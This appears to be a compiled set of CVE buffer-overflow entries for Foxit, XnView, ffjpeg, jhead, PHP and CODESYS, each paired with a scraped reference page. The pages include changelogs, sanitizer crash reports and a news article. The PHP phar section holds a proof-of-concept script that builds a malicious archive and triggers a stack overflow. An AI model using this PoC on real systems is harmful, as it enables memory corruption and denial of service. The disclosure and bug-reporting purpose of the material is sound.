Buffer Overflow vulnerability in cFilenameInit parameter in browseForDoc function in Foxit Software Foxit PDF Reader version 10.1.0.37527, allows local attackers to cause a denial of service (DoS) via crafted .pdf file.

This website uses cookies to provide you with the best possible experience and to optimize the website to best fit the needs of our visitors. By using this website, you automatically agree to the use of cookies and your IP address. For detailed information on the use of cookies on this website, please see our Privacy Policy .

OK

CVE-2020-35990: PDF Software & Tools Tailored to Your Business | Foxit

Buffer Overflow vulnerability in XNView version 2.49.3, allows local attackers to execute arbitrary code via crafted TIFF file.

Dear user,

XnView 2.49.4 for Windows is available. Versions are available on the normal XnView Download page.

Please note that the XnView Download page offers packages with German/French Setup and German/French Online help.

Direct links to the English Standard version are:  
http://download.xnview.com/XnView-win.exe (English Setup, Multi language)  
http://download.xnview.com/XnView-win.zip (ZIP file, Multi language)

XnView Shell Extension 32bits:  
http://download.xnview.com/XnShellEx.exe  
http://download.xnview.com/XnShellEx.zip

XnView Shell Extension 64bits:  
http://download.xnview.com/XnShellEx64.exe  
http://download.xnview.com/XnShellEx64.zip

SHA256:  
XnView-win.exe: 030E3E45C51A349A3417B52AD6F6547267F1AA6E86BF03BB13E49341AB9FAEB8  
XnView-win.zip: 9E936FB7CD699019A2D1ADF795D6BB078A08686D95ACA0BEA482E0ECE5C72902  
XnView-win-full.exe: 31E13FE27894610D27167ABB0503C6B109E00169D6F3E291BE6661D27953E1C6  
XnView-win-full.zip: 646DE249CEB6E9C1736BC34217C36E720FD7E2FA25468B271A6DEC18707D4E3E  
XnView-win-small.exe: 57E5DF33083C3F440CFA7E44ABE4403724679EEC7A1E57018A5B81A1748557FB  
XnView-win-small.zip: 15DC199567011B41B616BB38DFF31771A9D3E65F1517FC2BEE2068DD69B479FE

\_\_\_\_ 2.49.4 Changelog

\* Ghostscript 9.53.x  
\* GPS & file date - viewtopic.php?f=56&t=40971  
\* TIFF Security vulnerability (Thanks to Michael Heinzl)  
\* NConvert: -levels2 - viewtopic.php?f=57&t=40490  
\* NConvert: -resize supports cm/mm/inches  
\* NConvert: -autodeskew fixed  
\* NConvert: -noholder to disable %$ chars - viewtopic.php?f=57&t=40820

\_\_\_\_ 2.49.3 Changelog

\* Convert 16 to 256 colors - viewtopic.php?f=36&t=39421  
\* Disable ESC to close tabs - viewtopic.php?f=35&t=17078  
\[General\] EscToCloseView=0  
\* Select file from search results & switching mode - viewtopic.php?f=34&t=40063  
\* Title empty when recurse - viewtopic.php?f=36&t=39979  
\* Resize - viewtopic.php?f=35&t=40248  
\* Slideshow: Order of files - viewtopic.php?f=56&t=40087  
\* Fortis Mag fix  
\* NConvert: -wmsize watermark percent size - viewtopic.php?f=57&t=38754  
\* NConvert: canvas size in inches/cm/mm - viewtopic.php?f=57&t=39361  
\* NConvert: replace\_color - viewtopic.php?f=57&t=39769  
\* NConvert: -temperature added

\_\_\_\_ 2.49.2 Changelog

\* Problem with Ghostscript 9.50  
\* PDF font problem - viewtopic.php?f=36&t=39662  
\* CR3 - viewtopic.php?f=35&t=39478  
\* .sld must use 'Recurse' setting - viewtopic.php?f=35&t=39330  
\* GIF loop - viewtopic.php?f=36&t=31689  
\* PAM CMYK

\_\_\_\_ 2.49.1 Changelog

\* TIFF 16bits greyscale

\_\_\_\_ 2.49 Changelog

\* SQLite 3.29.0  
\* NConvert: greater\_than/less\_than condition - viewtopic.php?f=57&t=39147  
\* PSD: Error when writing metadata - viewtopic.php?f=57&t=39137  
\* Export - Problem with RGBA - viewtopic.php?f=36&t=39044  
\* Capture - viewtopic.php?f=36&t=38934  
\* Left/Right F11 to open fullscreen on Left/Right monitor  
\* Create multi file & folder with '.' - viewtopic.php?f=36&t=39008  
\* # to comment line in .sld file  
\* Multipage create: Check if output filename exists  
\* Slideshow crash when using animated GIF - viewtopic.php?f=36&t=38902  
\* XIM format import added  
\* Change timestamp must not use 12h format - viewtopic.php?f=36&t=38702  
\* GIF not played correctly in Slideshow - viewtopic.php?f=34&t=38303  
\* CVE - https://github.com/apriorit/pentesting/ ... ugs/xnview  
\* NConvert: -unsharp  
\* NConvert: -exposure - viewtopic.php?f=57&t=39136  
\* NConvert: -colorize h l s  
\* NConvert: Remove EXIF orientation -exif\_rotation - viewtopic.php?f=57&t=38648  
\* \[Rename\]/TemplateStart, position of number in template - viewtopic.php?f=34&t=38568  
\* CVE-2019-12151  
\* ShellEx: 'Convert...' & input fields

\_\_\_\_ 2.48 Changelog

\* RGB inverted when printing 8bits cmap picture from browser  
\* WebP 32bits  
\* PDF Multipage create - viewtopic.php?f=35&t=38030

\_\_\_\_ 2.47 Changelog

XCF 2.10  
ICNS with JPEG2000 icon  
GIF loop & Quick slideshow - viewtopic.php?f=36&t=31689  
Problem with local charset for image description EXIF field  
\[Start\]/BugBlueLine=1 to remove the bug of blue line  
PDF output without font info - viewtopic.php?f=35&t=38030  
Space must not show tagbox if not enabled  
NConvert: -no\_auto\_rotate - viewtopic.php?f=57&t=38239  
NConvert: -autocrop with position  
NConvert: add -lower to lower case output filename  
NConvert: Bug when output filename contains a numeric enumerator - viewtopic.php?f=57&t=38014

\_\_\_\_ 2.46 Changelog

JPEG2000 YCC - viewtopic.php?f=35&t=37806  
Bad loading for ARW - viewtopic.php?f=36&t=37683  
TIFF with JPEG compression - viewtopic.php?f=35&t=37585  
Adjust dialog clipped - viewtopic.php?f=36&t=32011  
PDF version 1.4 output  
Sqlite 2.24.0  
RLE & ICO vulnerabilities Cody Sixteen from STM Solutions  
NConvert: stdout problem on windows - viewtopic.php?f=57&t=37810

\_\_\_\_ 2.45 Changelog

License written in HKCU  
Support HPI with transparency  
Shows dots under certain conditions - viewtopic.php?f=36&t=37447  
Resize - viewtopic.php?f=36&t=37451  
Blue bar - viewtopic.php?f=36&t=36278  
Resize dialog crash with ^^ - viewtopic.php?f=36&t=36644  
Parameters & External program - viewtopic.php?f=35&t=15465

\_\_\_\_ 2.44 Changelog

Monitor power off during slideshow  
Color profile not used Browser>Print - viewtopic.php?f=36&t=36833  
\-filelist doesn't work anymore  
Tile child window - viewtopic.php?f=56&t=36527  
Strange colors on grey image - viewtopic.php?f=35&t=36485  
UTF8 Exif Image Description

\_\_\_\_ 2.43 Changelog

Better HEIF support - http://www.xnview.com/download/plugins/heif\_x32.zip  
Unwanted file types shown in Viewer - viewtopic.php?f=36&t=35484  
FileListUseExt=1  
Alpha glitch - viewtopic.php?f=36&t=36454  
Folder browsing via command line - viewtopic.php?f=36&t=36434  
Lossless crop corruption - viewtopic.php?f=36&t=36378

\_\_\_\_ 2.42 Changelog

HEIF support - Extract http://www.xnview.com/download/plugins/heif\_x32.zip in Plugins folder

\_\_\_\_ 2.41 Changelog

Basic support for unicode filename  
2Gb limitation on 64bits OS - http://newsgroup.xnview.com/viewtopic.php?f=36&t=35165  
Displaying RGBA image without use alpha - http://newsgroup.xnview.com/viewtopic.php?f=36&t=35809  
Print TIFF with orientation flag in browser - http://newsgroup.xnview.com/viewtopic.php?f=36&t=36197  
GIF loop not saved in .sld - http://newsgroup.xnview.com/viewtopic.php?f=35&t=35991  
Clip support - http://newsgroup.xnview.com/viewtopic.php?f=34&t=28554  
Slideshow crash on RAW files - http://newsgroup.xnview.com/viewtopic.php?f=36&t=34632  
TIF > 2GB & multipage - http://newsgroup.xnview.com/viewtopic.php?f=79&t=35056  
RGBA printing  
Thumbnails upscaling - http://newsgroup.xnview.com/viewtopic.php?f=35&t=36090  
NConvert: -keepdocsize fixed  
NConvert: -shadow - http://newsgroup.xnview.com/viewtopic.php?f=57&t=36163  
NConvert: -align - http://newsgroup.xnview.com/viewtopic.php?f=57&t=36164

\_\_\_\_ 2.40 Changelog

CMYK image default color profile - http://newsgroup.xnview.com/viewtopic.php?f=35&t=31685  
http://newsgroup.xnview.com/viewtopic.php?f=35&t=28839  
RGBA resize (bilinear) - http://newsgroup.xnview.com/viewtopic.php?f=36&t=33425  
http://newsgroup.xnview.com/viewtopic.php?t=29238  
http://newsgroup.xnview.com/viewtopic.php?t=34493  
Ctrl+RMB to copy color - http://newsgroup.xnview.com/viewtopic.php?p=141793  
Capture rectangle on second monitor - http://newsgroup.xnview.com/viewtopic.php?f=56&t=32892  
Print 50+ via command line - http://newsgroup.xnview.com/viewtopic.php?f=35&t=35350  
Filelist to print - http://newsgroup.xnview.com/viewtopic.php?f=34&t=35378  
LIBPNG 1.6.29  
SQLite 3.18.0  
ZLIB 1.2.11  
LCMS 2.8  
BMP 2+10+10+10 - http://newsgroup.xnview.com/viewtopic.php?f=36&t=32577  
Category removed if delete file - http://newsgroup.xnview.com/viewtopic.p ... 2&start=15  
Category moved with Cut/Paste  
8BF & undo - http://newsgroup.xnview.com/viewtopic.php?f=36&t=34508  
'Purge Now' - http://newsgroup.xnview.com/viewtopic.php?f=34&t=32667  
OpenEXR updated - http://newsgroup.xnview.com/viewtopic.php?f=36&t=33039  
Resize gamma correction - http://newsgroup.xnview.com/viewtopic.php?f=34&t=33273  
Change timestamp & DST - http://newsgroup.xnview.com/viewtopic.php?f=36&t=33483  
Selection + Tab - http://newsgroup.xnview.com/viewtopic.php?f=36&t=33983  
GIF loop - http://newsgroup.xnview.com/viewtopic.php?f=35&t=34036  
PAM format - http://newsgroup.xnview.com/viewtopic.php?f=36&t=35132  
JPEG 2000 - http://newsgroup.xnview.com/viewtopic.php?f=36&t=35277  
Maximize on first monitor - http://newsgroup.xnview.com/viewtopic.php?f=36&t=32343  
Resize default size - http://newsgroup.xnview.com/viewtopic.php?f=34&t=33694  
PEF for thumbnail's folder - http://newsgroup.xnview.com/viewtopic.php?f=35&t=35363  
Cancel removed from Setup wizard - http://newsgroup.xnview.com/viewtopic.php?f=34&t=32958  
Previous/Next file & RecognizeByExt == false - http://newsgroup.xnview.com/viewtopic.php?f=36&t=33127  
Next/Previous & video - http://newsgroup.xnview.com/viewtopic.php?f=36&t=35182  
Better dialog for update - http://newsgroup.xnview.com/viewtopic.php?f=34&t=19950  
WebP plugin updated  
OpenJPEG2000 updated  
RIOT addon updated  
PNGOUT updated  
X3F with only embedded JPEG  
NConvert: text with -text\_rotation - http://newsgroup.xnview.com/viewtopic.php?f=57&t=35441  
NConvert: -text\_border added

\_\_\_\_ 2.39 Changelog

no IPTC fields in tooltip/info  
Thumbnail for blend file

\_\_\_\_ 2.38 Changelog

Sort by exif - http://newsgroup.xnview.com/viewtopic.php?f=36&t=32387  
Zooming instead file navigation - http://newsgroup.xnview.com/viewtopic.php?f=36&t=33917

\_\_\_\_ 2.37 Changelog

Better HiDPI support  
Change timestamp and video  
GPS direction - http://newsgroup.xnview.com/viewtopic.php?f=35&t=33587  
Right click (make selection) and delete - http://newsgroup.xnview.com/viewtopic.php?f=36&t=33700  
NConvert: Multipage extract - http://newsgroup.xnview.com/viewtopic.php?f=57&t=33879

\_\_\_\_ 2.36 Changelog

FLIF format added  
SVG support via rsvg-convert.exe - http://newsgroup.xnview.com/viewtopic.php?f=34&t=31748  
Search similar & extension - http://newsgroup.xnview.com/viewtopic.php?f=56&t=32840  
Multipage save doesn't use read settings  
PCT crash - http://newsgroup.xnview.com/viewtopic.php?f=36&t=33025  
NConvert: -t start step for number in output name

\_\_\_\_ 2.35 Changelog

#THUMB\_WIDTH\_MAX# & #THUMB\_HEIGHT\_MAX# - http://newsgroup.xnview.com/viewtopic.php?f=34&t=30652  
JPEGXR  
Backspace not working in fullscreen  
LibPNG 1.6.20  
ZIPPack Addon - http://newsgroup.xnview.com/viewtopic.php?f=35&t=31563

Pierre.

CVE-2021-28427: XnView 2.49.4 - XnView Software

Buffer Overflow vulnerability in XNView before 2.50, allows local attackers to execute arbitrary code via crafted GEM bitmap file.

  

XnView Classic: Best Photo Viewer, Image Resizer & Batch Converter for Windows.

XnView is compatible with Windows 7 and Windows 10.  
Version 2.51.2

  

**XnView** is an efficient image viewer, browser and converter for Windows.  
This software is really simple to use and totally free for personal use. It supports more than 500 image formats! No Adware, No Spyware. Download for Windows

Features

Photo Viewer

With XnView you can browse, organize, and view your images in numerous ways:

*   Thumbnail View
*   FullScreen View
*   FilmStrip View
*   SlideShow with FX
*   Images Compare
*   etc...

Photo Editor

XnView allows you to process your images with an arsenal of editing tools:

*   Resize, Rotate, Crop
*   Lossless Rotate & Crop (jpeg)
*   Adjust Brightness, Contrast, ...
*   Auto Levels, Auto Contrast
*   Modify Colors depth & palette
*   Apply filters & Effects

Create

In addition to **exporting** to more than 70 Formats XnView lets you create:

*   SlideShows
*   Web Pages
*   Contact Sheets
*   Video Thumbnails Gallery
*   File Listings
*   Strip of Images

Unrivaled Compatibility

XnView lets you **read** about 500 formats (including Multipage and animated still formats APNG, TIFF, GIF, ICO,etc..).  
_Some formats may require Plug-ins_

XnView also provides a convenient **Screen Capture module** and Windows ™ **TWAIN & WIA** interface to capture images.

And Much More ...

Some other notable features of XnView are:

*   Metadata support & Editing (IPTC)
*   JPEG lossless Transforms
*   Duplicate File Finder
*   Batch Processing
*   Batch Rename
*   Print Module

Downloads

Download **XnView 2.51.2** for Windows:

Donate

XnView is provided as **FREEWARE** (NO Adware, NO Spyware) for private or educational use (including non-profit organizations).  
If you enjoy using XnView, Don't hesitate to help the developer with a small donation.

You may want to check out all the Addons also available for XnView.

SHA-256 checksums:  
XnView-win.exe: A09A25EC83F277580821AFC0982041078E8992A9C778E52984CE6CC8F3C69B90  
XnView-win.zip: B463C5E2B77F981614B67E4AAB0D78385DC2EE80A6A8852EE129ED2E345BD1D4  
XnView-win-full.exe: 5089486DD86D0DE1CB55EEA4D13EB73BDC2BBCECD4831371F971DE50E4E2DA7B  
XnView-win-full.zip: 96D8A69DA9014466A22ED3677426E0134D8C41452202E8C198314559A5A1807A  
XnView-win-small.exe: 064A8D8647C1D3FD2AAC97DB1FE8A04FDAD3E80C63A1AC3591C980452E7E01E2  
XnView-win-small.zip: 1DA17B608BB0D7E5892FAD7562D8E9E36C6459118AFA30F11A412C91AC6D7916'

Screenshots

History of changes

Changelog

Support

**Visit the Forum**

The XnView forum is probably the best place to start interacting with other users and the developer.

**User Guide**

XnView Wiki is where XnView user guide is maintained.

CVE-2021-28835: The Best Windows Photo Viewer, Image Resizer and Batch Converter · XnView

Buffer Overflow vulnerability in jfif_decode() function in rockcarry ffjpeg through version 1.0.0, allows local attackers to execute arbitrary code due to an issue with ALIGN.

There is a segment fault in jfif\_decode (ctxt=0x60a010, pb=0x7fffffffe3c0) at jfif.c:545.

My system is ubuntu 16.04.6 amd64. I compiled the lastest version of ffjpeg and use my fuzzer to fuzz it by using the command ling:  
ffjpeg -d \[file\_name\]

I got a crash sample that could cause a segment fault.

The sample is attached below.  

yang@yang-HP-ZHAN-99-Mobile-Workstation-G1:/MyProject/remote\_test/target\_src/ffjpeg/src$ gdb ./ffjpeg  
GNU gdb (Ubuntu 7.11.1-0ubuntu116.5) 7.11.1  
Copyright (C) 2016 Free Software Foundation, Inc.  
License GPLv3+: GNU GPL version 3 or later http://gnu.org/licenses/gpl.html  
This is free software: you are free to change and redistribute it.  
There is NO WARRANTY, to the extent permitted by law. Type "show copying"  
and "show warranty" for details.  
This GDB was configured as "x86\_64-linux-gnu".  
Type "show configuration" for configuration details.  
For bug reporting instructions, please see:  
http://www.gnu.org/software/gdb/bugs/.  
Find the GDB manual and other documentation resources online at:  
http://www.gnu.org/software/gdb/documentation/.  
For help, type "help".  
Type "apropos word" to search for commands related to "word"...  
Reading symbols from ./ffjpeg...done.  
(gdb) r -d /home/yang/crash.jpg  
Starting program: /home/yang/MyProject/remote\_test/target\_src/ffjpeg/src/ffjpeg -d /home/yang/crash.jpg

Program received signal SIGSEGV, Segmentation fault.  
0x0000000000402eb2 in jfif\_decode (ctxt=0x60a010, pb=0x7fffffffe3c0) at jfif.c:545  
545 yuv\_to\_rgb(\*ysrc, \*usrc, \*vsrc, bdst + 2, bdst + 1, bdst + 0);  
(gdb) list  
540 for (j=0; jwidth; j++) {  
541 int ux = j \* jfif->comp\_info\[1\].samp\_factor\_h / sfh\_max;  
542 int vx = j \* jfif->comp\_info\[2\].samp\_factor\_h / sfh\_max;  
543 usrc = yuv\_datbuf\[1\] + uy \* yuv\_stride\[1\] + ux;  
544 vsrc = yuv\_datbuf\[2\] + vy \* yuv\_stride\[2\] + vx;  
545 yuv\_to\_rgb(\*ysrc, \*usrc, \*vsrc, bdst + 2, bdst + 1, bdst + 0);  
546 bdst += 3;  
547 ysrc += 1;  
548 }  
549 bdst -= jfif->width \* 3;  
(gdb)

We used ASAN to identify crash type.  
\==12023==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f1c5c6da24c at pc 0x000000405d2d bp 0x7ffe6131cc00 sp 0x7ffe6131cbf0  
READ of size 4 at 0x7f1c5c6da24c thread T0  
#0 0x405d2c in jfif\_decode /home/aota04/MC\_xxfuzz/test/ffjpeg/build\_asan/src/jfif.c:545  
#1 0x401233 in main (/home/aota04/MC\_xxfuzz/test/ffjpeg/build\_asan/src/ffjpeg+0x401233)  
#2 0x7f1c5b1f383f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2083f)  
#3 0x4010c8 in \_start (/home/aota04/MC\_xxfuzz/test/ffjpeg/build\_asan/src/ffjpeg+0x4010c8)

0x7f1c5c6da24c is located 0 bytes to the right of 141900-byte region \[0x7f1c5c6b7800,0x7f1c5c6da24c)  
allocated by thread T0 here:  
#0 0x7f1c5b635602 in malloc (/usr/lib/x86\_64-linux-gnu/libasan.so.2+0x98602)  
#1 0x404c96 in jfif\_decode /home/aota04/MC\_xxfuzz/test/ffjpeg/build\_asan/src/jfif.c:442  
#2 0x401233 in main (/home/aota04/MC\_xxfuzz/test/ffjpeg/build\_asan/src/ffjpeg+0x401233)  
#3 0x7f1c5b1f383f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2083f)

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/aota04/MC\_xxfuzz/test/ffjpeg/build\_asan/src/jfif.c:545 jfif\_decode  
Shadow bytes around the buggy address:  
0x0fe40b8d33f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
0x0fe40b8d3400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
0x0fe40b8d3410: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
0x0fe40b8d3420: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
0x0fe40b8d3430: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
\=>0x0fe40b8d3440: 00 00 00 00 00 00 00 00 00\[04\]fa fa fa fa fa fa  
0x0fe40b8d3450: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0fe40b8d3460: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0fe40b8d3470: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0fe40b8d3480: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0fe40b8d3490: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
Shadow byte legend (one shadow byte represents 8 application bytes):  
Addressable: 00  
Partially addressable: 01 02 03 04 05

CVE-2020-24222: ffjpeg "jfif_decode" function segment fault · Issue #31 · rockcarry/ffjpeg

Buffer Overflow vulnerability in jpgfile.c in Matthias-Wandel jhead version 3.04, allows local attackers to execute arbitrary code and cause a denial of service (DoS).

**Impact**

fuzzer&poc1.zip

    fstark@fstark-virtual-machine:~/jhead-master$ ./jhead afl_collect_output_dir/fuzz1\:id\:000013\,sig\:06\,src\:000263\,time\:295896\,op\:arith8\,pos\:8\,val\:+15 
    =================================================================
    ==4212==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000eff4 at pc 0x0000004bd123 bp 0x7ffd6e2fdb80 sp 0x7ffd6e2fdb70
    READ of size 1 at 0x60200000eff4 thread T0
        #0 0x4bd122 in process_COM /home/fstark/jhead-master/jpgfile.c:51
        #1 0x4be667 in ReadJpegSections /home/fstark/jhead-master/jpgfile.c:240
        #2 0x4bfbad in ReadJpegSections /home/fstark/jhead-master/jpgfile.c:125
        #3 0x4bfbad in ReadJpegFile /home/fstark/jhead-master/jpgfile.c:378
        #4 0x4b71bb in ProcessFile /home/fstark/jhead-master/jhead.c:905
        #5 0x4066dc in main /home/fstark/jhead-master/jhead.c:1756
        #6 0x7f3dc850083f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
        #7 0x40a1e8 in _start (/home/fstark/jhead-master/jhead+0x40a1e8)
    
    0x60200000eff4 is located 0 bytes to the right of 4-byte region [0x60200000eff0,0x60200000eff4)
    allocated by thread T0 here:
        #0 0x485392 in malloc (/home/fstark/jhead-master/jhead+0x485392)
        #1 0x4bd558 in ReadJpegSections /home/fstark/jhead-master/jpgfile.c:172
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/fstark/jhead-master/jpgfile.c:51 process_COM
    Shadow bytes around the buggy address:
      0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    =>0x0c047fff9df0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa[04]fa
      0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Heap right redzone:      fb
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack partial redzone:   f4
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
    ==4212==ABORTING
    

**Patches**

Fixed by 4827ed3  
Matthias-Wandel@4827ed3

**References**

Matthias-Wandel#8  
Matthias-Wandel@4827ed3

CVE-2020-28840: heap-buffer-overflow on process_COM in jpgfile.c:51

In PHP version 8.0.* before 8.0.30,  8.1.* before 8.1.22, and 8.2.* before 8.2.8, when loading phar file, while reading PHAR directory entries, insufficient length checking may lead to a stack buffer overflow, leading potentially to memory corruption or RCE. 



**Summary**

Buffer mismanagement in phar_dir_read() causes a buffer overflow and a buffer overread later.

**Details**

https://github.com/php/php-src/blob/be71cadc2f899bc39fe27098042139392e2187db/ext/phar/dirstream.c#L89C1-L116

There are few issues here:

*   The if check to_read == 0 || count < ZSTR_LEN(str_key) is not right.  
    In particular, if this is false we know that count >= ZSTR_LEN(str_key).  
    Furthermore, because of to_read = MIN(ZSTR_LEN(str_key), count); we now actually have: to_read == ZSTR_LEN(str_key).  
    If we have a filename length (i.e. ZSTR_LEN(str_key)) equal to sizeof(php_stream_dirent), then we get ZSTR_LEN(str_key) == count == to_read == sizeof(php_stream_dirent).
    
    Take a look now at this line: ((php_stream_dirent *) buf)->d_name[to_read + 1] = '\0';.  
    Assume sizeof(php_stream_dirent) is 4096 like on most Linuxes. Then we write at offset 4097, which is two bytes outside of buf.  
    This line was actually supposed to use to_read instead of to_read + 1, because now even if it doesn't overflow, it does not properly NUL-terminate the filename. We're just lucky there's a memset above.  
    Correcting that to use to_read doesn't solve the whole problem: it would still overflow because it will write at offset 4096 which is still outside buf.
    
    This means we have a stack information leak and a buffer write overflow.
    
*   Both the memset and the return value assume that count == sizeof(php_stream_dirent).  
    In principle if there are any callers where that count is smaller, a buffer overflow occurs in the memset.  
    However, inside PHP itself I did not find any such caller, but this may be a concern for third-party extensions.
    

**PoC**

I created a reproducer using PHP-8.0 with these configure flags: ./configure --enable-debug --disable-all --enable-phar --with-valgrind using compiler gcc (GCC) 13.1.1 20230429.

Create the malicious Phar file using:

<?php
$phar = new Phar('myarchive.phar');
$phar\->startBuffering();
$phar\->addFromString(str\_repeat('A', PHP\_MAXPATHLEN - 1).'B', 'This is the content of the file.');
$phar\->stopBuffering();
?>

Trigger the buffer overflow and overread using this script:

<?php
$handle = opendir("phar://./myarchive.phar");
$x = readdir($handle);
closedir($handle);

var\_dump($x);
?>

If you run this in Valgrind, i.e. valgrind ./sapi/cli/php trigger.php you'll find two Valgrind complaints:

    ==42575== Conditional jump or move depends on uninitialised value(s)
    ==42575==    at 0x4847ED8: strlen (vg_replace_strmem.c:501)
    ==42575==    by 0x53BE9C: zif_readdir (dir.c:389)
    ==42575==    by 0x6D05C4: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:1295)
    ==42575==    by 0x742F7D: execute_ex (zend_vm_execute.h:55163)
    ==42575==    by 0x747848: zend_execute (zend_vm_execute.h:59523)
    ==42575==    by 0x696376: zend_execute_scripts (zend.c:1694)
    ==42575==    by 0x5F6D45: php_execute_script (main.c:2546)
    ==42575==    by 0x788A53: do_cli (php_cli.c:949)
    ==42575==    by 0x789ADB: main (php_cli.c:1337)
    ==42575== 
    ==42575== Syscall param write(buf) points to uninitialised byte(s)
    ==42575==    at 0x4AA2BC4: write (write.c:26)
    ==42575==    by 0x7875EA: sapi_cli_single_write (php_cli.c:261)
    ==42575==    by 0x78768D: sapi_cli_ub_write (php_cli.c:293)
    ==42575==    by 0x611034: php_output_op (output.c:1082)
    ==42575==    by 0x60F2B7: php_output_write (output.c:261)
    ==42575==    by 0x5B3B0D: php_var_dump (var.c:120)
    ==42575==    by 0x5B432A: zif_var_dump (var.c:218)
    ==42575==    by 0x6D031A: ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER (zend_vm_execute.h:1234)
    ==42575==    by 0x742F6D: execute_ex (zend_vm_execute.h:55159)
    ==42575==    by 0x747848: zend_execute (zend_vm_execute.h:59523)
    ==42575==    by 0x696376: zend_execute_scripts (zend.c:1694)
    ==42575==    by 0x5F6D45: php_execute_script (main.c:2546)
    

The first complaint is because the strlen() function overreads the d\_name buffer because it isn't properly NUL-terminated.  
The second one is because it writes the name using var\_dump, and the name contains (uninitialized) stack data.  
Valgrind won't complain about the stack buffer write overflow, but you can inspect the memory using gdb for example that a piece of the stack gets overwritten.

**Impact**

Exploiting this is difficult to do and heavily depends on the application you're targetting, but possible in theory I think using a combination of stack info leaks and buffer write overflows. People who inspect contents of untrusted phar files could be affected.

CVE-2023-3824: Buffer overflow and overread in phar_dir_read()

A set of 15 high-severity security flaws have been disclosed in the CODESYS V3 software development kit (SDK) that could result in remote code execution and denial-of-service under specific conditions, posing risks to operational technology (OT) environments.
The flaws, tracked from CVE-2022-47379 through CVE-2022-47393 and dubbed CoDe16, carry a CVSS score of 8.8 with the exception of

Operational Technology / Vulnerability

A set of 15 high-severity security flaws have been disclosed in the CODESYS V3 software development kit (SDK) that could result in remote code execution and denial-of-service under specific conditions, posing risks to operational technology (OT) environments.

The flaws, tracked from CVE-2022-47379 through CVE-2022-47393 and dubbed CoDe16, carry a CVSS score of 8.8 with the exception of CVE-2022-47391, which has a severity rating of 7.5. Twelve of the flaws are buffer overflow vulnerabilities.

"Exploitation of the discovered vulnerabilities, which affect all versions of CODESYS V3 prior to version 3.5.19.0, could put operational technology (OT) infrastructure at risk of attacks, such as remote code execution (RCE) and denial-of-service (DoS)," Vladimir Tokarev of the Microsoft Threat Intelligence Community said in a report.

While a successful weaponization of the flaws requires user authentication as well as an in-depth knowledge of the proprietary protocol of CODESYS V3, the issues could have serious impacts that could result in shutdowns and malicious tampering of critical automation processes.

The remote code execution bugs, in particular, could be abused to backdoor OT devices and interfere with the functioning of programmable logic controllers (PLCs) in a manner that could pave the way for information theft.

"Exploiting the vulnerabilities requires user authentication as well as bypassing the Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR) used by both the PLCs," Tokarev explained.

To get past the user authentication barrier, a known vulnerability (CVE-2019-9013, CVSS score: 8.8) is used to steal credentials by means of a replay attack against the PLC, followed by leveraging the flaws to trigger a buffer overflow and gain control of the device.

Patches for the flaws were released in April 2023. A brief description of the issues is as follows -

*   **CVE-2022-47379** - After successful authentication, specific crafted communication requests can cause the CmpApp component to write attacker-controlled data to memory, which can lead to a denial-of-service condition, memory overwriting, or remote code execution.

*   **CVE-2022-47380 and CVE-2022-47381** - After successful authentication, specific crafted communication requests can cause the CmpApp component to write attacker-controlled data to stack, which can lead to a denial-of-service condition, memory overwriting, or remote code execution.

*   **CVE-2022-47382, CVE-2022-47383, CVE-2022-47384, CVE-2022-47386, CVE-2022-47387, CVE-2022-47388, CVE-2022-47389, and CVE-2022-47390** - After successful authentication, specific crafted communication requests can cause the CmpTraceMgr component to write attacker-controlled data to stack, which can lead to a denial-of-service condition, memory overwriting, or remote code execution.

*   **CVE-2022-47385** - After successful authentication, specific crafted communication requests can cause the CmpAppForce component to write attacker-controlled data to stack, which can lead to a denial-of-service condition, memory overwriting, or remote code execution.

*   **CVE-2022-47391** - Crafted communication requests can cause the affected products to read internally from an invalid address, potentially leading to a denial-of-service condition.

*   **CVE-2022-47392** - After successful authentication, specific crafted communication requests with inconsistent content can cause the CmpApp/CmpAppBP/CmpAppForce components to read internally from an invalid address, potentially leading to a denial-of-service condition.

